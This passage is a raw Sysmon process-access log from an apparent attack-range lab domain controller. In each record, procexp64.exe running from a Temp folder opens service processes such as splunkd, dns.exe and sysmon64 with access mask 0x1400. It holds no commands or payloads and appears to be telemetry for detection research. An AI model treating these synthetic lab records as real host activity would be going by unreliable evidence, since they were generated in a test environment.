Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 